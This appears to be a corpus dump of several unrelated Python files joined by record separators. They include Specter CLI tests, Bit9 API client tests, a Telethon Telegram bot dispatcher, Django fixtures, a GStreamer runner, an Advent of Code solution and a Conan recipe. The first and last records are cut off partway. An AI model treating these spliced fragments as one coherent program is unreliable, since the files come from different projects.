@patch("cryptoadvance.specter.cli.cli_server.init_app")
def test_server_debug(init_app, create_app, caplog):
    """--debug must raise the cryptoadvance logger to DEBUG level."""
    caplog.set_level(logging.DEBUG)
    cli = CliRunner()
    outcome = cli.invoke(server, ["--debug"])
    print(outcome.output)
    if outcome.exception is not None:
        # Print the traceback so failures are easy to track down.
        traceback.print_tb(outcome.exception.__traceback__)
        print(outcome.exception)
    assert outcome.exit_code == 0
    assert "We're now on level DEBUG on logger cryptoadvance" in caplog.text
@patch("cryptoadvance.specter.cli.cli_server.create_app")
@patch("cryptoadvance.specter.cli.cli_server.init_app")
def test_server_datafolder(init_app, create_app, caplog):
    """--specter-data-folder must be written into the app config."""
    caplog.set_level(logging.DEBUG)
    fake_app = MagicMock()
    fake_app.config = MagicMock()
    fake_app.config.__getitem__.side_effect = mock_config_dict.__getitem__
    create_app.return_value = fake_app
    cli = CliRunner()
    outcome = cli.invoke(server, ["--specter-data-folder", "~/.specter-some-folder"])
    print(outcome.output)
    if outcome.exception is not None:
        # Print the traceback so failures are easy to track down.
        traceback.print_tb(outcome.exception.__traceback__)
        print(outcome.exception, file=sys.stderr)
    print(fake_app.config.mock_calls)
    assert outcome.exit_code == 0
    fake_app.config.__setitem__.assert_called_once_with(
        "SPECTER_DATA_FOLDER", "~/.specter-some-folder"
    )
@patch("cryptoadvance.specter.cli.cli_server.create_app")
@patch("cryptoadvance.specter.cli.cli_server.init_app")
def test_server_config(init_app, create_app, caplog):
    """--config MuhConfig must be expanded to the fully qualified config class."""
    caplog.set_level(logging.DEBUG)
    mock_app = MagicMock()
    mock_app.config = MagicMock()
    # Reuse the shared module-level fixture: the original carried an inline
    # dict that duplicated mock_config_dict key for key.
    mock_app.config.__getitem__.side_effect = mock_config_dict.__getitem__
    create_app.return_value = mock_app
    runner = CliRunner()
    with runner.isolated_filesystem():
        result = runner.invoke(server, ["--config", "MuhConfig"])
        print(result.output)
        if result.exception is not None:
            # Makes searching for issues much more convenient
            traceback.print_tb(result.exception.__traceback__)
            print(result.exception, file=sys.stderr)
        assert result.exit_code == 0
        print(mock_app.config.mock_calls)
        create_app.assert_called_once_with(config="cryptoadvance.specter.config.MuhConfig")
| StarcoderdataPython |
6492788 | <gh_stars>0
'''Basic simulation unittest'''
import tests
import model.user
from unittest import TestCase
class TestSubmit(TestCase):
    """End-to-end check of the submit flow: create a kernel-level admin,
    log in via the HTTP API, then trigger a problem update."""
    @tests.async_test
    async def test_submit(self):
        # Create a kernel-level admin account directly through the model layer.
        await model.user.create('admin', '<PASSWORD>', 'Admin',
            level=model.user.UserLevel.kernel)
        # Log in through the HTTP API with the same credentials.
        response = await tests.request('/user/login', {
            'mail': 'admin',
            'password': '<PASSWORD>'
        })
        self.assertEqual(response, 'Success')
        # An authenticated session may trigger a problem update.
        response = await tests.request('/problem/update', {})
        self.assertEqual(response, 'Success')
| StarcoderdataPython |
5068718 | <gh_stars>1-10
# Based on https://github.com/google-coral/project-bodypix/blob/master/gstreamer.py
from functools import partial
import sys
import time
import numpy as np
import gi
gi.require_version("Gst", "1.0")
gi.require_version("GstBase", "1.0")
from gi.repository import GLib, GObject, Gst, GstBase
GObject.threads_init()
Gst.init(None)
def on_bus_message(bus, message, loop):
    """GStreamer bus callback: quit *loop* on EOS or ERROR, log warnings/errors.

    Always returns True so the signal watch stays installed.
    """
    kind = message.type
    if kind == Gst.MessageType.EOS:
        loop.quit()
    elif kind == Gst.MessageType.WARNING:
        err, debug = message.parse_warning()
        sys.stderr.write("Warning: %s: %s\n" % (err, debug))
    elif kind == Gst.MessageType.ERROR:
        err, debug = message.parse_error()
        sys.stderr.write("Error: %s: %s\n" % (err, debug))
        loop.quit()
    return True
def run_pipeline(pipelineStr):
    """
    Parse *pipelineStr*, play it to completion, then pause/restart it once
    more before tearing everything down.

    The two bare ``except: pass`` clauses of the original swallowed *every*
    exception; they are narrowed to KeyboardInterrupt, which is what a
    Ctrl-C during ``loop.run()`` raises.

    :param pipelineStr: gst-launch style pipeline description
    """
    print("Launch string:", pipelineStr)
    pipeline = Gst.parse_launch(pipelineStr)
    pipeline.set_state(Gst.State.PLAYING)
    state_change_info = pipeline.get_state(Gst.CLOCK_TIME_NONE)
    print(
        f"Image src pipeline state change to running successful? : {state_change_info[0] == Gst.StateChangeReturn.SUCCESS}"
    )
    loop = GObject.MainLoop()
    bus = pipeline.get_bus()
    bus.add_signal_watch()
    bus.connect("message", on_bus_message, loop)
    try:
        loop.run()
    except KeyboardInterrupt:
        pass
    pipeline.set_state(Gst.State.NULL)
    # Second run: cycle the same pipeline through PAUSED -> PLAYING again.
    pipeline.set_state(Gst.State.PAUSED)
    pipeline.set_state(Gst.State.PLAYING)
    try:
        loop.run()
    except KeyboardInterrupt:
        pass
    pipeline.set_state(Gst.State.NULL)
    # Drain any pending events from the default GLib main context.
    while GLib.MainContext.default().iteration(False):
        pass
if __name__ == "__main__":
run_pipeline(
"pyspinsrc num-buffers=10 exposure=10000 ! video/x-raw, framerate=10/1, width=480 ! videoconvert ! xvimagesink"
)
run_pipeline(
"pyspinsrc num-buffers=10 exposure=20000 ! video/x-raw, framerate=15/1, height=480 ! videoconvert ! xvimagesink"
)
| StarcoderdataPython |
3538630 | # Copyright 2017 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS-IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for API Context."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import httplib
import mock
import requests
from absl.testing import absltest
from upvote.gae.modules.bit9_api.api import context
from upvote.gae.modules.bit9_api.api import exceptions as excs
from upvote.gae.modules.bit9_api.api import test_utils
@mock.patch.object(
    requests, 'request', return_value=test_utils.GetTestResponse())
class ContextTest(absltest.TestCase):
    """Unit tests for context.Context construction and request execution."""

    def testBadVersion(self, _):
        """An unsupported API version must be rejected."""
        with self.assertRaises(ValueError):
            context.Context('foo.corn', 'foo', 1, version='v2')

    def testBadTimeout(self, _):
        """Negative or non-numeric timeouts must be rejected."""
        with self.assertRaises(ValueError):
            context.Context('foo.corn', 'foo', -1, version='v2')
        with self.assertRaises(ValueError):
            context.Context('foo.corn', 'foo', 'foo', version='v2')

    def testNoSchema(self, mock_req):
        """A bare hostname is prefixed with https:// and the API path."""
        api = context.Context('foo.corn', 'foo', 1)
        api.ExecuteRequest('GET', api_route='abc')
        mock_req.assert_called_once_with(
            'GET', 'https://foo.corn/api/bit9platform/v1/abc', headers=mock.ANY,
            json=None, verify=mock.ANY, timeout=mock.ANY)

    def testHeaders(self, mock_req):
        """The auth token and the JSON content type are always sent."""
        api = context.Context('foo.corn', 'foo', 1)
        api.ExecuteRequest('GET')
        wanted_headers = {
            'X-Auth-Token': 'foo',
            'Content-Type': 'application/json'}
        mock_req.assert_called_once_with(
            'GET', mock.ANY, headers=wanted_headers, json=None, verify=True,
            timeout=1)

    def testWithPath(self, mock_req):
        """A host carrying an extra path keeps that path before the API route."""
        api = context.Context('foo.corn/other/path', 'foo', 1)
        api.ExecuteRequest('GET', api_route='abc')
        mock_req.assert_called_once_with(
            'GET', 'https://foo.corn/other/path/api/bit9platform/v1/abc',
            headers=mock.ANY, json=None, verify=mock.ANY, timeout=mock.ANY)

    def testNoRoute(self, mock_req):
        """Omitting api_route hits the API base URL."""
        api = context.Context('foo.corn', 'foo', 1)
        api.ExecuteRequest('GET')
        mock_req.assert_called_once_with(
            'GET', 'https://foo.corn/api/bit9platform/v1', headers=mock.ANY,
            json=None, verify=mock.ANY, timeout=mock.ANY)

    def testRequestError(self, mock_req):
        """Transport-level failures surface as RequestError."""
        mock_req.side_effect = requests.RequestException
        api = context.Context('foo.corn', 'foo', 1)
        with self.assertRaises(excs.RequestError):
            api.ExecuteRequest('GET')

    def testClientError(self, mock_req):
        """A 4xx response surfaces as RequestError."""
        mock_req.return_value = test_utils.GetTestResponse(
            status_code=httplib.BAD_REQUEST)
        api = context.Context('foo.corn', 'foo', 1)
        with self.assertRaises(excs.RequestError):
            api.ExecuteRequest('GET')

    def testServerError(self, mock_req):
        """A 5xx response surfaces as RequestError."""
        mock_req.return_value = test_utils.GetTestResponse(
            status_code=httplib.INTERNAL_SERVER_ERROR)
        api = context.Context('foo.corn', 'foo', 1)
        with self.assertRaises(excs.RequestError):
            api.ExecuteRequest('GET')

    def testNotFound(self, mock_req):
        """A 404 maps to the more specific NotFoundError."""
        mock_req.return_value = test_utils.GetTestResponse(
            status_code=httplib.NOT_FOUND)
        api = context.Context('foo.corn', 'foo', 1)
        with self.assertRaises(excs.NotFoundError):
            api.ExecuteRequest('GET')

    def testEmptyResponse(self, mock_req):
        """A 200 with an empty body is treated as a RequestError."""
        mock_req.return_value = test_utils.GetTestResponse(status_code=httplib.OK)
        mock_req.return_value.text = None
        api = context.Context('foo.corn', 'foo', 1)
        with self.assertRaises(excs.RequestError):
            api.ExecuteRequest('GET')

    def testFailedJsonParse(self, mock_req):
        """Malformed JSON in the response body is a RequestError."""
        mock_req.return_value = test_utils.GetTestResponse()
        mock_req.return_value.text = '{"Invalid": "JSON}'
        api = context.Context('foo.corn', 'foo', 1)
        with self.assertRaises(excs.RequestError):
            api.ExecuteRequest('GET')
if __name__ == '__main__':
absltest.main()
| StarcoderdataPython |
6415147 | import os
# NOTE(review): starts the local redis server at import time; requires
# passwordless sudo and silently ignores failure — confirm this is intended.
os.system("sudo service redis-server start")
from telethon import TelegramClient, events, Button, extensions, functions, types
from os.path import dirname, realpath, join
import re
import asyncio
import datetime
from utilities import utilities
import json
# Event loop shared by the Telethon client created later in run_client().
loop = asyncio.get_event_loop()
# Placeholder; run_client() replaces this with the live TelegramClient.
utilities.client = None
def sort_key(p):
    """Return a plugin's display name; used to sort plugin lists alphabetically."""
    plugin_name = p["name"]
    return plugin_name
def run_client():
    """Load the config, create and start the Telethon client, then load plugins.

    Side effects: populates utilities.config, utilities.client,
    utilities.plugins and utilities.public_plugins.
    """
    utilities.config = utilities.get_config()
    config = utilities.config
    utilities.client = TelegramClient(
        "sessions_bot", config["api_id"], config["api_hash"], loop=loop
    )
    utilities.client.start()
    utilities.load_plugins()
    # Keep plugin lists alphabetically ordered for help/listing output.
    utilities.plugins.sort(key=sort_key)
    utilities.public_plugins.sort(key=sort_key)
run_client()
# These Db imports happen after run_client() on purpose-unknown grounds;
# NOTE(review): confirm they do not depend on run_client() side effects.
from Db.mute_sql import getMutedUser, remMuteUser
from Db.dev_sql import getDevsUsers
# Cache developer ids as ints; the "%.0f" formatting drops a float ".0" suffix.
for dev in getDevsUsers():
    utilities.devs.append(int("%.0f" % dev.user_id))
async def saveBotId():
    """Print identity info for the logged-in account and persist its id/type."""
    me = await utilities.client.get_me()
    utilities.prLightGray("name : " + me.first_name)
    if me.username:
        utilities.prYellow("username : https://t.me/" + me.username)
    # API bots and CLI (user) sessions are reported differently.
    if me.bot:
        utilities.prGreen("botType : API")
    else:
        utilities.prGreen("botType : CLI")
    utilities.prBlack("---------------------------")
    utilities.config["bot_id"] = me.id
    utilities.config["isbot"] = me.bot
    utilities.save_config()
@utilities.client.on(events.ChatAction)
async def my_event_handler(event):
    """Dispatch chat join/add events to every plugin exposing an 'added' hook."""
    try:
        if event.user_joined or event.user_added:
            # NOTE(review): from_user is assigned but never used below.
            from_user = event.added_by
            target_user = event.user
            plugins = utilities.plugins
            for plugin in plugins:
                # Only plugins that declare an 'added' hook participate.
                if "added" not in plugin:
                    continue
                # Plugins may restrict themselves to bot-api or bot-cli mode.
                if "bot" in plugin and utilities.config["isbot"] != plugin["bot"]:
                    if plugin["bot"]:
                        await event.reply("for bot-api only")
                    else:
                        await event.reply("for bot-cli only")
                    return
                # if plugin["sudo"]:
                #     if check_sudo(event.sender_id):
                #         return_values = await plugin["added"](
                #             event,
                #             event.chat_id,
                #             0
                #             if (target_user.id in utilities.user_steps)
                #             else utilities.user_steps[target_user.id]["step"],
                #             crons=utilities.crons,
                #         )
                #         for return_value in return_values:
                #             if return_value:
                #                 await (return_value)
                #     else:
                #         await event.reply("for sudores")
                # else:
                # The hook receives the event, the chat and the target user's
                # current step (0 when the user is not mid-conversation).
                return_values = await plugin["added"](
                    event,
                    event.chat_id,
                    0
                    if (target_user.id not in utilities.user_steps)
                    else utilities.user_steps[target_user.id]["step"],
                )
                # A hook may return awaitables (e.g. replies) to be executed.
                if return_values:
                    for return_value in return_values:
                        await (return_value)
    except Exception as e:
        print("chat_handler : %s" % (e))
@utilities.client.on(events.NewMessage)
async def command_interface(event):
    """Console logger: print a colored one-line summary of every incoming message."""
    try:
        message = event.message
        prefix = "send"
        if message.is_reply:
            prefix = "reply"
        # Outgoing messages are not logged.
        if message.out:
            return
        from_id = message.from_id
        to_id = message.chat_id
        # Green for private chats, purple for groups/channels.
        if event.is_private:
            pr = utilities.prGreen
        else:
            pr = utilities.prPurple
        if message.raw_text and not message.via_bot_id:
            stri = (
                str(from_id)
                + ": "
                + prefix
                + " text message : "
                + message.raw_text
                + " to "
                + str(to_id)
            )
            pr(stri)
        elif message.media and not message.via_bot_id:
            pr(str(from_id) + ": " + prefix + " media message to " + str(to_id))
        elif message.via_bot_id:
            pr(str(from_id) + ": " + prefix + " inline message to " + str(to_id))
        else:
            # Anything else (no text, no media, not inline) is flagged in red.
            utilities.prRed(
                str(from_id) + ": " + prefix + " unknown message to " + str(to_id)
            )
    except Exception as e:
        print(str(e))
@utilities.client.on(events.MessageEdited)
@utilities.client.on(events.NewMessage)
async def my_event_handler(event):
    """Main message dispatcher (new and edited messages).

    Order of operations:
      1. lift any mute on the sender for this chat,
      2. handle the global ``#/!cancel`` command (aborts a wizard),
      3. if the sender is mid-wizard, route the message only to the
         owning plugin with the stored step number,
      4. otherwise apply flood control, then match the text (or a media
         placeholder such as ``__photo__``) against every plugin's
         patterns and run the matching plugins.
    """
    try:
        message = event.message
        chat_id = event.chat_id
        from_id = event.sender_id
        plugins = utilities.plugins
        # Mute is "until next message": receiving anything unmutes the sender.
        mutedUsers = getMutedUser(chat_id, from_id)
        if mutedUsers:
            remMuteUser(chat_id, from_id)
        if message.raw_text:
            # Global escape hatch: "#cancel" / "/cancel" / "!cancel" aborts
            # whatever multi-step conversation the sender is in.
            matches = re.findall("^[#/!](cancel)$", event.raw_text, re.IGNORECASE)
            if len(matches) > 0 and matches[0] == "cancel":
                if from_id in utilities.user_steps:
                    del utilities.user_steps[from_id]
                    return await message.reply("Canceling successfully !")
        if from_id in utilities.user_steps:
            # Wizard mode: only the plugin that owns this conversation sees
            # the message.
            for plugin in plugins:
                if plugin["name"] == utilities.user_steps[from_id]["name"]:
                    for pattern in plugin["patterns"]:
                        if re.search(
                            pattern, event.raw_text, re.IGNORECASE | re.MULTILINE
                        ):
                            matches = re.findall(
                                pattern, event.raw_text, re.IGNORECASE | re.DOTALL
                            )
                            break
                    # for/else: no pattern matched — feed the plugin a dummy
                    # match so matches[0] is still populated.
                    else:
                        matches = ["xxxxxxxxxx"]
                    if plugin["sudo"]:
                        if utilities.check_sudo(from_id):
                            return_values = await plugin["run"](
                                message,
                                matches[0],
                                chat_id,
                                utilities.user_steps[from_id]["step"],
                            )
                            for return_value in return_values:
                                if return_value:
                                    try:
                                        await (return_value)
                                    except Exception as e:
                                        print("step :" + str(e))
                        else:
                            # Non-sudo user in a sudo wizard: drop silently.
                            return
                    else:
                        return_values = await plugin["run"](
                            message,
                            matches[0],
                            chat_id,
                            utilities.user_steps[from_id]["step"],
                        )
                        if return_values:
                            for return_value in return_values:
                                await (return_value)
                    break
            return
        elif message.raw_text is not None and message.raw_text != "":
            # Lazily initialise the flood-control switch in the config.
            if "flood" not in utilities.config:
                utilities.config["flood"] = True
                utilities.save_config()
            if utilities.config["flood"]:
                # Per-sender message counter held in redis with a 1-second
                # TTL, so only rapid bursts accumulate.
                pv = utilities.red.get("flood-" + str(message.sender_id)) or 0
                # print("flood-" + str(message.sender_id), pv)
                if pv == 0:
                    # Fresh burst: (re)arm the one-shot warning flag.
                    utilities.flood[message.sender_id] = True
                utilities.red.set(
                    "flood-" + str(message.sender_id), (int(pv) + 1), ex=1
                )
                # 5th message inside the window: warn once, then stay silent
                # (flag flipped to False) while the burst continues.
                if (int(pv) + 1) == 5 and utilities.flood[message.sender_id]:
                    await message.reply("please do not flood...")
                    utilities.prRed(
                        str(message.sender_id) + " : is causing flood please stop..."
                    )
                    utilities.flood[message.sender_id] = False
                    return
                elif (int(pv) + 1) >= 5:
                    return
            # Normal dispatch: every plugin whose pattern matches gets run.
            for plugin in plugins:
                for pattern in plugin["patterns"]:
                    if re.search(pattern, event.raw_text, re.IGNORECASE | re.MULTILINE):
                        # Plugin restricted to the other runtime mode: reply
                        # and stop dispatching entirely.
                        if (
                            "bot" in plugin
                            and utilities.config["isbot"] != plugin["bot"]
                        ):
                            if plugin["bot"]:
                                await event.reply("for bot-api only")
                            else:
                                await event.reply("for bot-cli only")
                            return
                        matches = re.findall(
                            pattern,
                            event.raw_text,
                            re.IGNORECASE | re.MULTILINE | re.DOTALL,
                        )
                        if plugin["sudo"]:
                            if utilities.check_sudo(event.sender_id):
                                return_values = await plugin["run"](
                                    event, matches[0], chat_id, 0, crons=utilities.crons
                                )
                                for return_value in return_values:
                                    if return_value:
                                        try:
                                            await (return_value)
                                        except Exception as e:
                                            print("text main :" + str(e))
                            else:
                                # Not sudo: try the remaining patterns/plugins.
                                continue
                        else:
                            return_values = await plugin["run"](
                                event, matches[0], chat_id, 0, crons=utilities.crons
                            )
                            if return_values:
                                for return_value in return_values:
                                    await (return_value)
        elif message.media is not None or message.file is not None:
            # Media messages are matched against synthetic placeholders
            # instead of text.  NOTE(review): only photo/gif are mapped;
            # other media kinds match patterns against "" — confirm intended.
            match = ""
            if message.photo:
                match = "__photo__"
            if message.gif:
                match = "__gif__"
            for plugin in plugins:
                for pattern in plugin["patterns"]:
                    if re.search(pattern, match, re.IGNORECASE | re.MULTILINE):
                        matches = re.findall(pattern, match, re.IGNORECASE)
                        if plugin["sudo"]:
                            if utilities.check_sudo(event.sender_id):
                                return_values = await plugin["run"](
                                    event, matches[0], chat_id, 0
                                )
                                for return_value in return_values:
                                    try:
                                        await (return_value)
                                    except Exception as e:
                                        print("media :" + str(e))
                            else:
                                return
                        else:
                            return_values = await plugin["run"](
                                event, matches[0], chat_id, 0
                            )
                            if return_values:
                                for return_value in return_values:
                                    await (return_value)
    except Exception as e:
        # Surface any plugin/dispatch failure back into the chat.
        print(str(e))
        await event.reply("Error : " + str(e))
@utilities.client.on(events.InlineQuery)
async def my_event_handler(event):
    """Route inline queries to plugins whose ``inlineData`` patterns match.

    Sudo-only plugins answer "for sudors only" to non-sudo callers;
    otherwise the plugin's ``inlineQuery`` coroutine is awaited and any
    awaitables it returns are awaited in order.
    """
    builder = event.builder
    try:
        plugins = utilities.plugins
        for plugin in plugins:
            if "inlineQuery" not in plugin:
                continue
            for pattern in plugin["inlineData"]:
                if re.search(pattern, str(event.text), re.IGNORECASE | re.MULTILINE):
                    matches = re.findall(
                        pattern,
                        str(event.text),
                        re.IGNORECASE | re.MULTILINE | re.DOTALL,
                    )
                    # Current wizard step for this sender (0 = not in a wizard).
                    step = (
                        0
                        if (event.sender_id not in utilities.user_steps)
                        else utilities.user_steps[event.sender_id]["step"]
                    )
                    if plugin["sudo"]:
                        if utilities.check_sudo(event.sender_id):
                            return_values = await plugin["inlineQuery"](
                                event,
                                matches[0],
                                event.chat_id,
                                step,
                                crons=utilities.crons,
                            )
                            # Fix: guard against a plugin returning None —
                            # the non-sudo branch already guarded; this one
                            # previously iterated unconditionally.
                            if return_values:
                                for return_value in return_values:
                                    if return_value:
                                        try:
                                            await (return_value)
                                        except Exception as e:
                                            print("inline :" + str(e))
                        else:
                            await event.answer(
                                [
                                    builder.article(
                                        "for sudors only", text="for sudors only"
                                    )
                                ]
                            )
                    else:
                        return_values = await plugin["inlineQuery"](
                            event,
                            matches[0],
                            event.chat_id,
                            step,
                        )
                        if return_values:
                            for return_value in return_values:
                                await (return_value)
    except Exception as e:
        print(str(e))
@utilities.client.on(events.CallbackQuery)
async def handler(event):
    """Route callback-query (inline keyboard button) events to plugins
    whose ``callbackData`` patterns match the decoded payload.

    Sudo-only plugins answer "Sudors only!" to non-sudo callers.
    """
    try:
        plugins = utilities.plugins
        for plugin in plugins:
            if "callbackQuery" not in plugin:
                continue
            for pattern in plugin["callbackData"]:
                if re.search(
                    pattern, str(event.data.decode()), re.IGNORECASE | re.MULTILINE
                ):
                    matches = re.findall(
                        pattern,
                        str(event.data.decode()),
                        re.IGNORECASE | re.MULTILINE | re.DOTALL,
                    )
                    # Current wizard step for this sender (0 = not in a wizard).
                    step = (
                        0
                        if (event.sender_id not in utilities.user_steps)
                        else utilities.user_steps[event.sender_id]["step"]
                    )
                    if plugin["sudo"]:
                        if utilities.check_sudo(event.sender_id):
                            return_values = await plugin["callbackQuery"](
                                event,
                                matches[0],
                                event.chat_id,
                                step,
                                crons=utilities.crons,
                            )
                            # Fix: guard against a plugin returning None —
                            # the non-sudo branch already guarded; this one
                            # previously iterated unconditionally.
                            if return_values:
                                for return_value in return_values:
                                    if return_value:
                                        try:
                                            await (return_value)
                                        except Exception as e:
                                            print("callback :" + str(e))
                        else:
                            await event.answer("Sudors only!")
                    else:
                        return_values = await plugin["callbackQuery"](
                            event,
                            matches[0],
                            event.chat_id,
                            step,
                        )
                        if return_values:
                            for return_value in return_values:
                                await (return_value)
    except Exception as e:
        print(str(e))
async def clock():
    """Background scheduler: once per second, fire any due cron jobs.

    Jobs come from two places:
      * the persistent redis list ``crons`` (JSON-encoded, ISO timestamp),
      * the in-memory ``utilities.crons`` list (datetime objects).
    A due job's owning plugin ``cron`` coroutine is awaited and the job is
    removed from its queue.
    """
    while True:
        # lrange returns a snapshot, so removing entries while looping is safe.
        for _data in utilities.red.lrange("crons", 0, -1):
            data = json.loads(_data)
            if datetime.datetime.fromisoformat(data["time"]) < datetime.datetime.now():
                for plugin in utilities.plugins:
                    if "cron" in plugin and plugin["name"] == data["name"]:
                        return_values = await plugin["cron"](data)
                        # Fix: a plugin returning None previously raised and
                        # killed this scheduler task for good.
                        if return_values:
                            for return_value in return_values:
                                if return_value:
                                    try:
                                        await (return_value)
                                    except Exception as e:
                                        print("clock :" + str(e))
                utilities.red.lrem("crons", 0, _data)
        if len(utilities.crons) != 0:
            # Fix: iterate over a snapshot — the original mutated the live
            # list via .remove() mid-iteration, skipping the next element
            # after every removal.
            for data in list(utilities.crons):
                if data["time"] < datetime.datetime.now():
                    for plugin in utilities.plugins:
                        if "cron" in plugin and plugin["name"] == data["name"]:
                            return_values = await plugin["cron"](data)
                            if return_values:
                                for return_value in return_values:
                                    if return_value:
                                        try:
                                            await (return_value)
                                        except Exception as e:
                                            print("clock local :" + str(e))
                    utilities.crons.remove(data)
        await asyncio.sleep(1)
# One-shot "I restarted" notification: a prior update command stored the
# requesting chat id in config["updateChat"]; tell that chat we are back,
# then clear the flag so it only fires once.
if "updateChat" in utilities.config:
    loop.create_task(
        utilities.client.send_message(
            utilities.config["updateChat"], "The bot restart successfully."
        )
    )
    del utilities.config["updateChat"]
    utilities.save_config()
# Background tasks: the per-second cron scheduler and the bot-id saver.
loop.create_task(clock())
loop.create_task(saveBotId())
utilities.prCyan("Started Receveving Messages ...")
# Block here until the Telegram client disconnects.
utilities.client.run_until_disconnected()
| StarcoderdataPython |
11242061 | import pytest
from django.test import Client
class AccountObjects:
    """Reusable test-account fixture bundle.

    Creates two users and three organizations for ``handle``, wires up
    grainy permissions (crud on the personal org, read-only on the second),
    and exposes pre-authenticated django and DRF test clients.
    """

    def __init__(self, handle):
        # Deferred imports: the module must be importable before django
        # settings are configured.
        from django.contrib.auth import get_user_model
        from rest_framework.test import APIClient

        from fullctl.django.auth import permissions
        from fullctl.django.models import Organization, OrganizationUser

        user_model = get_user_model()

        self.user = user_model.objects.create_user(
            username=f"user_{handle}",
            email=f"{handle}@localhost",
            password="<PASSWORD>",
            first_name=f"user_{handle}",
            last_name="last_name",
        )
        self.other_user = user_model.objects.create_user(
            username=f"other_user_{handle}",
            email=f"other_{handle}@localhost",
            password="<PASSWORD>",
            first_name=f"other_user_{handle}",
            last_name="last_name",
        )

        # One personal org plus one shared org, synced for self.user.
        self.orgs = Organization.sync(
            [
                {"id": 1, "name": f"ORG{handle}", "slug": handle, "personal": True},
                {
                    "id": 2,
                    "name": f"ORG{handle}-2",
                    "slug": f"{handle}-2",
                    "personal": False,
                },
            ],
            self.user,
            None,
        )

        # Full crud on the personal org, read-only on the second.
        self.user.grainy_permissions.add_permission(self.orgs[0], "crud")
        self.user.grainy_permissions.add_permission(self.orgs[1], "r")

        self.org = self.orgs[0]
        OrganizationUser.objects.create(org=self.org, user=self.other_user)

        # An organization neither user belongs to, for negative tests.
        self.other_org = Organization.objects.create(
            name="Other",
            slug="other",
            id=3,
        )

        self.api_client = APIClient()
        self.api_client.login(username=self.user.username, password="<PASSWORD>")

        self.client = Client()
        self.client.login(username=self.user.username, password="<PASSWORD>")

        self.perms = permissions(self.user)
def make_account_objects(handle="test"):
    """Factory helper: build an AccountObjects fixture bundle for *handle*."""
    return AccountObjects(handle)
@pytest.fixture
def dj_client_anon():
    """Anonymous (not logged-in) django test client."""
    return Client()
@pytest.fixture
def dj_account_objects():
    """Default account fixture bundle (handle "test")."""
    return make_account_objects()
@pytest.fixture
def dj_account_objects_b():
    """Second, independent account fixture bundle (handle "test_b")."""
    return make_account_objects("test_b")
| StarcoderdataPython |
3405543 | <reponame>aapalo/aoc2020<filename>1/code.py
#!/usr/bin/python3
#from collections import Counter
#import re
#import os
import time
#from collections import defaultdict
#from collections import deque
''' ####### '''
date = 1
dev = 0 # extra prints
part = 3 # 1,2, or 3 for both
samp = 0 # 0 or 1
''' ####### '''
def day(te):
    """Return the product of two distinct entries of *te* that sum to 2020.

    If no such pair exists, print the list (original debug behaviour) and
    return 0.  Replaces the original O(n^2) double loop with a single
    Counter-based pass; the pair selection (and hence the product) matches
    the original exactly, including the case of a repeated value (e.g. two
    1010 entries) which requires two distinct indices.
    """
    from collections import Counter

    counts = Counter(te)
    for value in te:
        complement = 2020 - value
        # A self-pair (value == complement) needs at least two occurrences.
        if complement in counts and (complement != value or counts[value] > 1):
            return value * complement
    print(te)
    return 0
def day2(te):
    """Return the product of three distinct entries of *te* summing to 2020.

    Prints the found triple (original debug behaviour) before returning the
    product; if no triple exists, print the list and return 0.  Uses
    ``itertools.combinations`` instead of the original triple index loop —
    same lexicographic search order over index triples, so the first triple
    found (and the product) is unchanged.
    """
    from itertools import combinations

    for a, b, c in combinations(te, 3):
        if a + b + c == 2020:
            print(a, b, c)
            return a * b * c
    print(te)
    return 0
''' ####### '''
# Start the wall-clock timer used for the elapsed-time report at the end.
time0 = time.time()
# `samp` (set at the top of the file) toggles sample vs real puzzle input.
if samp == 1:
    filename = "/sample.txt"
else:
    filename = "/input.txt"
try:
    # Preferred layout: input lives in a directory named after the day.
    with open(str(date) + filename,"r") as f:
        t = f.readlines()
except FileNotFoundError:
    # Fallback: the script is being run from inside the day's directory.
    with open("." + filename,"r") as f:
        t = f.readlines()
# Normalise whitespace, then convert each line to an int.
t = [(x.strip().replace(' ',' ')) for x in t]
t = [int(x) for x in t] #str to int
# `part` selects which puzzle part(s) to run (3 = both).
if part == 1:
    print("Part 1: ", day(t))
elif part == 2:
    print("Part 2: ", day2(t))
elif part == 3:
    #run both
    print("Part 1: ", day(t))
    print("Part 2: ", day2(t))
tdif = time.time() - time0
print("Elapsed time: {:.4f} s".format(tdif))
| StarcoderdataPython |
6559236 | from conans import ConanFile, CMake, tools
class FoobarConan(ConanFile):
    """Conan recipe for the `foobar` library.

    Builds with CMake and additionally produces a native installer
    (deb / rpm / tgz / zip, selected via the ``installer`` option) by
    running CPack, then ships that artifact inside the Conan package.
    """
    name = "foobar"
    version = "0.1.0"
    license = "MIT"
    settings = "os", "compiler", "build_type", "arch"
    # `installer` picks the CPack generator invoked in build().
    options = {"shared": [True, False], "installer": ["deb", "rpm", "tgz", "zip"]}
    default_options = "shared=False", "installer=deb"
    generators = "cmake"
    exports_sources = "src/*", "include/*", "CMakeLists.txt"
    exports = "LICENSE"
    def build(self):
        """Configure, build and install via CMake, then run CPack with the
        generator chosen by the ``installer`` option."""
        cmake = CMake(self)
        cmake.configure()
        cmake.build()
        cmake.install()
        # CPack generator names are upper-case (DEB, RPM, TGZ, ZIP).
        self.run("cpack -G %s %s" % (str(self.options.installer).upper(), self.build_folder))
    def package(self):
        """Copy the license and the generated installer into the package."""
        self.copy("LICENSE", dst="license")
        # CPack names tgz artifacts with a .tar.gz extension.
        installer = "%s-%s.%s" % (self.name, self.version, ("tar.gz" if self.options.installer == "tgz" else str(self.options.installer)))
        self.copy(installer, dst="install")
    def package_info(self):
        """Expose every built library to consumers of this package."""
        self.cpp_info.libs = tools.collect_libs(self)
| StarcoderdataPython |
277084 | #!/usr/bin/python3
import argparse
import os
import sys
from src.util import Util
from src.step2.program import Program, ProgramRegex
from src.LR0Parser import LR0Parser
from src.grammar import Grammar
from src.log import Log
import re
if __name__ == '__main__':
    # Load the grammar definition and echo it for inspection.
    grammar = Grammar.from_lines(Util.get_lines_filename('src/step2/grammar.rg'))
    print(str(grammar))
    # Scan the hard-coded source program into a PIF (program internal form).
    program = Program()
    program.scan('src/step2/code.ry')
    # print(program.get_pif(), '\n')
    print(program)
    # Alternative regex-based scanner, currently disabled.
